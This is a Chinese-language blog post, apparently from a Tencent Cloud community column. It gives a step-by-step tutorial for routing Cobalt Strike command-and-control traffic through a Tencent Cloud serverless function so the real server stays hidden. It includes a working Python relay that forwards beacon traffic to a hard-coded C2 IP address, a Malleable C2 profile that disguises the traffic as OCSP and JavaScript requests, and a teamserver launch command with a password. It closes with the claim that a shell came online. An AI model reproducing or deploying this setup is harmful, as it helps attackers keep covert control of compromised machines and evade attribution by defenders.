前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >利用腾讯云函数上线CS

利用腾讯云函数上线CS

作者头像
逍遥子大表哥
发布于 2023-01-04 00:20:53
发布于 2023-01-04 00:20:53
2.6K00
代码可运行
举报
文章被收录于专栏:kali blogkali blog
运行总次数:0
代码可运行

首先,我们需要登录腾讯云,开启云函数。 登录腾讯云后,搜索云函数。开通即可。

初次登录,需要授权。 登录控制台后,点击新建。

函数名称随意,选择从头开始,环境填Python3.6,选完后下拉,把代码搞里头。

复制下面代码,并修改服务器地址。

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# coding: utf8
import json,requests,base64
def main_handler(event, context):
    response = {}
    path = None
    headers = None
    try:
        C2='http://43.134.164.72:80'
        if 'path' in event.keys():
            path=event['path']
        if 'headers' in event.keys():    
            headers=event['headers']
        if 'httpMethod' in event.keys() and event['httpMethod'] == 'GET' :
            resp=requests.get(C2+path,headers=headers,verify=False) 
        else:
            resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)
            print(resp.headers)
            print(resp.content)
        response={
            "isBase64Encoded": True,
            "statusCode": resp.status_code,
            "headers": dict(resp.headers),
            "body": str(base64.b64encode(resp.content))[2:-1]
        }
    except Exception as e:
        print('error')
        print(e)
    finally:
        return response

完成后,点击保存! 接着点击触发管理,创建触发器 格式如下

点击api名称编辑后到达此页面,路径修改为/

完成 后点击 发布服务 新增C2的profile文件,命名为win_tecent_cloud_func.profile

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
set sample_name "t";
set sleeptime "3000";
set jitter    "0";
set maxdns    "255";
set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/5.0)";

http-get {

    set uri "/api/x";

    client {
        header "Accept" "*/*";
        metadata {
            base64;
            prepend "SESSIONID=";
            header "Cookie";
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Server" "Nodejs";
        output {
            base64;
            print;
        }
    }
}
http-stager {  
    set uri_x86 "/vue.min.js";
    set uri_x64 "/bootstrap-2.min.js";
}
http-post {
    set uri "/api/y";
    client {
        header "Accept" "*/*";
        id {
            base64;
            prepend "JSESSION=";
            header "Cookie";
        }
        output {
            base64;
            print;
        }
    }

    server {
        header "Content-Type" "application/ocsp-response";
        header "content-transfer-encoding" "binary";
        header "Connection" "keep-alive";
        output {
            base64;
            print;
        }
    }
}

保存完成后,存放在cs目录下。 启动cs服务端

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
 ./teamserver vpsip admin12345 win_tecent_cloud_func.profile

将云函数的公网接口地址域名填入listener的http hosts和stager的hosts 注意不要http 和80

添加监听

生成shell后成功上线。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
流量加密之C2隐藏
文章地址:https://www.freebuf.com/articles/network/330713.html
亿人安全
2022/06/21
12.7K1
流量加密之C2隐藏
【红队APT】反朔源隐藏&C2项目&CDN域前置&云函数&数据中转&DNS转发
国内外云服务上大部分已经不支持域前置了,作者在阿里云刚刚复现成功…… 这里做简单的流程演示和相关的溯源分析
没事就要多学习
2024/07/18
3860
【红队APT】反朔源隐藏&C2项目&CDN域前置&云函数&数据中转&DNS转发
红队攻防之隐匿真实Cobalt Strike IP
点击新建云函数,选择创建方式—自定义创建,函数名称自定义或者默认都可以,运行环境选择python3.6,其他版本也行。
FB客服
2021/05/20
3.1K0
红队攻防之隐匿真实Cobalt Strike IP
云函数隐藏C2爬坑记
// **坑点一:**要根据cs监听类型http/https在脚本内填入c2服务器地址
Khan安全团队
2022/01/05
2.3K1
红队作业 | ​MSF和CS实战技巧汇总
其实就是内网穿透,使用frp做映射也能实现相同的效果,内网的中的Kali可以通过VSP访问到另外一个内网中。
Ms08067安全实验室
2022/04/06
1.1K0
红队作业 | ​MSF和CS实战技巧汇总
云函数各种使用方式
云函数代理蚁剑流量 1.创建云函数 #!/usr/bin/env # -*- coding:utf-8 -*- import requests import json from urllib.parse import urlsplit def geturl(urlstr): jurlstr = json.dumps(urlstr) dict_url = json.loads(jurlstr) return dict_url['url'] def main_handler(e
R0A1NG
2022/02/19
1.4K0
云函数各种使用方式
cobaltstrike 流量隐藏
监听器配置填入地址 service-cv4vqio3-1307700818.sh.apigw.tencentcs.com
黑战士
2024/04/17
2230
Cobalt Strike特征隐藏和流量加密(CS服务器伪装)
测试成功 5.到cloudflare添加域名,并修改dns 开启自动HTTPS重写
R0A1NG
2022/02/19
3.5K0
Cobalt Strike特征隐藏和流量加密(CS服务器伪装)
云函数进阶:云函数URL化、集成响应、定时任务和云函数路由
云函数并不是只能在uni-app中使用,我们完全可以脱离uni-app的环境来调用,这就需要用云函数URL化这个能力。把云函数给其他平台、环境的应用当成普通的http请求来访问。
大帅老猿
2022/04/13
5.5K1
云函数进阶:云函数URL化、集成响应、定时任务和云函数路由
Malleable-C2-Profiles配置
在日常的渗透测试工作中,我们需要做很多的规避操作,因为我们所使用的C2工具等,可能早已被AV等防护软件所标记,所以我们需要订制我们的攻击工具。而这就引出了我们的今天的重点Malleable C2 ,Malleable C2 是 Cobalt Strike 的一项功能, 意为 "可定制的" 的 C2 服务器. Malleable C2 允许我们仅通过一个简单的配置文件来改变 Beacon 与 C2 通信时的流量特征与行为。
鸿鹄实验室
2021/04/15
1.5K0
Malleable-C2-Profiles配置
CS4.9 使用 CrossC2 上线 Linux 详细教程
锦鲤安全的技术文章仅供参考,此文所提供的信息仅供网络安全人员学习和参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。如有侵权烦请告知,我们会立即删除并致歉。本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!谢谢!
Creaper
2024/08/27
1.6K0
CS4.9 使用 CrossC2 上线 Linux 详细教程
云函数实现代理
博客貌似有很久很久没有更新了。但是其实并没有停止学习(笔记大部分写到了语雀上,有空闲时间同步到博客)。今天看了公众号里的一篇文章,自己实际操作了一下发现有一些坑,所以来做个记录
用户2700375
2022/06/09
2K0
云函数实现代理
python爬虫教程:批量抓取 QQ 群信息
本文讲解Python批量抓取 QQ 群信息,包括群名称、群号、群人数、群主、地域、分类、标签、群简介等内容,返回 XLS / CSV / JSON 结果文件。
python学习教程
2019/08/06
5.7K3
requests:Python最经典的http库
requests 模块是 python 基于 urllib,采用 Apache2 Licensed 开源协议的 HTTP 库。它比 urllib 更加方便,可以节约我们大量的工作,完全满足 HTTP 测试需求。Requests 的哲学是以 PEP 20 的习语为中心开发的,所以它比 urllib 更加 Pythoner
luckpunk
2023/09/29
1.8K0
CS如何配置通过CDN上线
CDN需要关闭缓存或开启开发模式,如果不关闭缓存,会出现执行命令,回不来返回内容以及机器超时。
HACK学习
2020/08/27
2.2K0
CS如何配置通过CDN上线
「玩转腾讯云」API网关+云函数SCF开启OAuth2.0认证实战
如果在按照教程测试的时候遇到服务调用失败的情况,可以直接跳到第五步,查看以下避坑指北呦!
shwinpiocess的技术之路
2020/06/04
2.4K0
ASISCTF-firewalled复现
给了源码,我们得到一个docker-compose.yml包含两个服务的文件:flag-container 和 firewalled-curl。第二个通过 8000 端口暴露在公网上。它们都是基于apache 的flask应用。
pankas
2022/10/31
3730
ASISCTF-firewalled复现
【云函数SCF】浏览器请求函数URL,实现CORS
云函数可以让业务部署更快速更轻松,对于我来说,部署API非常方便,在以前API网关就担任了HTTP触发器的功能,不过在今年7月,API网关宣布了下架的消息,转而使用TSE云原生网关,不过对于我们业务量不大的用户来说,TSE的价格实在承担不起,而且很多功能也用不上
Ar-Sr-Na
2024/08/31
5061
红队技术-社工钓鱼细节技巧
但一般来说,企业邮箱都存在邮服网关,邮件很难投递,所以我们要选择一些针对公开群众的邮箱
hyyrent
2023/10/17
5290
红队技术-社工钓鱼细节技巧
DDCTF2019
滴~ 这道题的误导很严重 进入题目 URL为 http://117.51.150.246/index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09,将参数解码 >>
安恒网络空间安全讲武堂
2019/05/09
7510
DDCTF2019
相关推荐
流量加密之C2隐藏
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验